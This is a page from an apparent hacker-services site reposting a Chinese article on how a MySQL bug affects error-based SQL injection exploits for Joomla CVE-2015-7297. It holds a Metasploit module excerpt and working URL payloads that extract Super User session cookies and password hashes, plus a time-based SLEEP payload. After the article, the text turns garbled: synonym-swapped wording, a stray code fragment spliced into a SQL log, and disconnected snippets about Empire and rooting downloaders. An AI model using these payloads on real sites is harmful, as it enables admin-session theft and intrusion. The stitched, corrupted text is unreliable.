找黑客平台

黑客技术软件:你的PoC和EXP或许得改改了

访客5年前黑客资讯753
一、前语
 

在MySQL 5.7.5之前的所有主版别存在一个BUG,该或许导致影响POC/EXP需求从头编写或批改的问题。 

BUG信息链接:

https://bugs.mysql.com/bug.php?id=58081

二、问题阐明

在BUG阐明中,能够经过以下SQL句子复现:

set names latin1;
drop table if exists t1;
create table t1(a int) engine=myisam;
insert into t1 values (0),(0),(1),(0),(0);
select count(*) from t1, t1 t2 group by insert('', t2.a, t1.a,(@@global.max_binlog_size));

MySQL版别低于5.7.5中,实行以上SQL句子,会报如下过错:

Duplicate entry '107374182410737418241' for key 'group_key'
三、POC/EXP影响剖析3.1 原因剖析

一般报错性SQL注入POC或EXP编写的时分,POC/EXP编写思路是经过SQL句子实行某个句子让WEB APP将报错(包括要实行的SQL句子查询效果)信息打印出来。

Joomla__APP__SQL_Injection__CVE_2015_7297这个缝隙为例: 
在Joomla 3.4.4b版别对应com_contenthistory组件的视图文件/administrator/components/com_contenthistory/views/history/view.html.php中:

if (count($errors = $this->get('Errors')))
        {
            JError::raiseError(500, implode("n", $errors));

            return false;
        }

呈现SQL句子查询SQL句子查询过错时,会将要害报错信息打印出来。

因此这也导致在MetaSploit 结构中,对应运用模块:

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb

77行界说的sqli运用函数中,经过报错 *** 让Joomla将过错信息打印出来:

def sqli( tableprefix )

    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.

    sql = " (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id "

    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'vars_get' => {
        'option' => 'com_contenthistory',
        'view' => 'history',
        'list[ordering]' => '',
        'item_id' => '1',
        'type_id' => '1',
        'list[select]' => sql
        }
      })

经过MySQL查询日志,能够看到MSF实行sqli获取已登录的超级管理员用户的session_id(即身份令牌Cookie)时。实行SQL句子为:

SELECT  (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from `u6egd_session` WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id ,uc.name AS editor
FROM `u6egd_ucm_history` AS h
LEFT JOIN u6egd_users AS uc ON uc.id = h.editor_user_id
WHERE `h`.`ucm_item_id` =接下来该怎么办? 1 AND `h`.`ucm_type_id` = 1
ORDER BY `h`.`save_date`

留意:

u6egd只是表前缀,不同环境下会改变。

该SQL句子实在实行后,报的过错如下:

因此,我们可结构对应的Payload:

/index.php?option=com_contenthistory&view=history&list[select]=(select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from %23__session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id

希望呼应含有已登陆超级管理员的session_id(即身份令牌Cookie):

我们在MySQL 8.0版别中,看到没有报错了:

3.2 实践修正状况

PHP 5.6.40mysql Ver 14.14 Distrib 5.7.26环境下,我们发现官方所谓的修正声称并不精确:

能够看到,MySQL低于5.7.5的部分小版别现已修正了(5.7.5应该是完全修正,小版别或许还有其他Bug),经过MySQL官方信息:

https://bugs.mysql.com/bug.php?id=90398

才看到现已在5.7.5完全修正。但在最终又阐明MySQL 5.7.27 and 8.0.17修正,这就有点为难了…

3.3 POC与EXP编写影响

经过实践环境剖析,在PHP 5.6.40mysql Ver 14.14 Distrib 5.7.26Joomla 3.4.4环境下进行缝隙复现,运用同一个Payload运用无法获取到对应数据了: 
Payload:

index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select 1 from (select count(*),concat((select password from %23__users limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)x)

 

在后台MySQL日志看到的查询句子为:

SELECT (select 1 from (select count(*),concaif (Uri.parse(url).getHost().endsWith(".legitimate.com")) { t((select password from  *** 2ah_users limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)x),uc.name AS editor
FROM ` *** 2ah_ucm_history` AS h
LEFT JOIN  *** 2ah_users AS uc ON uc.id = h.editor_user_id
WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1
ORDER BY `h`.`save_date`

 

 

实在实行时,发现返回空数据了:

 

 

因此,在实践编写对应的Joomla缝隙POC或EXP时,需一同选用依据时刻注入 *** 进行注入判别与运用。 
如Payload:

index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(SELECT 8533 FROM (SELECT(SLEEP(5)))x)

 

对应MySQL查询日志

SELECT (SELECT 8533 FROM (SELECT(SLEEP(5)))x),uc.name AS editor
FROM ` *** 2ah_ucm_history` AS h
LEFT JOIN  *** 2ah_users AS uc ON uc.id = h.editor_user_id
WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1
ORDER BY `h`.`save_date`

 

 

比照时刻差来判别与运用:

 

 

 

也就是说,你的POC、EXP是时分需求改改了,拿来主义这时分行不通!

 

*本文作者:麒麟安全实验室

黑客技术软件:你的PoC和EXP或许得改改了

我选择的检验运用在NSURLSession中启用了SSL pinning,经过检验后我供认SSL_CTX_set_custom_verify()的确会在翻开联接时被调用:在详细结束上,还需求考虑以下问题:你的PoC和EXP可能得改改了

黑客技术软件print "[-] Couldn't get Device Driver handle." [...]17. fprintf(stderr, "%s: failed to load %s: %sn", argv[0], argv[1], dlerror());

最初步实行的downloader,会远程下载实行root.sh/rootv2.sh/lower.sh/lowerv2.sh1.运用file敕令快速辨认文件模范 $ brew install class-dump黑客技术软件

当我们工作navicat便利 *** 的一同 能够看到powershell.exe现已悄悄的链接empire这儿有一个os,能够实行系统指令 http://www.lua.org/manual/5.2/manual.html#pdf-os.execute

[1][2][3][4]黑客接单网

挺怅惘的没有正确的记录下来,漏了许多东西。# This file is empty, feel free to

intent scheme url的内容能够依据一下语法规则设置的比较完善:# strace -e trace=chmod,chown -f nginx关于内核数据结构,能够参看这儿,我大多是用它来作结构上的参看。你的PoC和EXP可能得改改了

黑客技术软件Enisa警告说,医院将会成为 *** 侵犯的下一个政策。 NULL, // showmanyc输出的效果应该为扩展之后变量的值,与键入用户名的效果是相同的。

缺点:二进制的 *** 存储,抓包后几乎不可读,调试起来或许不便利。

上述也只是“亡羊补牢”,哪怕你能在之一时刻反映过来,并进行正确的补偿,你的移动资金仍旧有被人套现的或许。因此,要想更大极限保证移动资金安全,“未雨绸缪”才是重中之重。那么,怎样才算未雨绸缪呢?

黑客技术软件

else: # this means nobreakexport GPG_AGENT_INFOlog = open(home + "log.log","w+")你的PoC和EXP可能得改改了

私有云vs.公有云wiTECH与其他我们从前见过的确诊程序还有其他一项不同,wiTECH系统是用Java写的,而不是C/C++。这样的话,逆向工程就更简略了,由于其和睦的称谓,并且能够把字节代码反编译成Java源。wmic和winexe需求你自己进行编译,走运的是,Metabrik简化了这个进程你只需求工作指令即可结束。由于wmic和winexe源自同一软件套件,你只需求工作remote::wmi和remote::winexe的其间一个设备指令。这儿我认为你应该现已设备了VitualBox的虚拟机所以并没有工作system::virtualbox Brik的设备指令。

四、现在在工作的进程是啥?


本文标题:黑客技术软件:你的PoC和EXP或许得改改了
标签: 黑客技术软件:你的PoC和EXP可能得改改了
返回列表

上一篇:qq登陆器:怎么经过Linux xxd指令进行提权

下一篇:东营南站(东营南站附近有宾馆吗)

相关文章

怎么才能赚钱最快(一个月赚10万最快赚钱方法)

怎么才能赚钱最快(一个月赚10万最快赚钱方法)

跨境电商行业正在热火朝天、如火如荼的向前发展,越来越多的人投身其中。做跨境电商的人越来越多,随之而来的竞争也会越来越激烈,如何在跨境电商大军中脱颖而出?新商机在日本,在跨境电商爆发式发展的今天,日本才...

基于场景的反馈设计应该怎么做?

基于场景的反馈设计应该怎么做?

编辑导语:在利用一款APP可能任何一款产物时,我们的许多操纵行为都但愿可以或许获得满足的反馈,一个舒适的反馈可以瞬间晋升用户的好感,进而转化成忠诚用户。那么,基于场景的反馈设计到底应该怎么做呢? 在...

黑客变白(变成黑客的代码)

黑客变白(变成黑客的代码)

淘宝切号频繁被黑能白回来吗 1、黑转白号:黑号只要不继续参与刷单或违法行为,正常购物一年左右就可以转白。在一些不是很严重的情况下,很快就会变白。还是那句话,淘宝的黑名不是人工封的,而是某个程序封的,所...

曹操的诗以什么见称【曹操的诗歌主要风格特点】

曹操的诗以什么见称(曹操的诗歌主要风格特点) 建安诗坛是中国文学史上五言兴盛、七言诗奠基的阶段 ,这个时期的作家众多,诗人也十分活跃,是诗歌史上的一次创作高潮期 ,而且还形成了为人称赞的“建安风骨”...

怎么着找黑客(怎么找黑客)

去一些大型黑客网站就可以学的到的黑客基地华夏黑客同盟之类的 你找他们干什么,找到了他们也不会帮你的,想做事情还是自己学技术,学技术就去非黑客安全论坛这里绝对是你最好的地方非黑客安全论坛从华夏黑客联。...

XSS进犯的解决方法

 在我上一篇《前端安全之XSS进犯》文中,并没有把XSS进犯的处理办法说完好,而XSS的进犯又那么形形色色,有没有一招“独孤九剑”能够抗衡,究竟那么多状况场景,开发人员无法逐个照料过来,而今日经过阅览...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.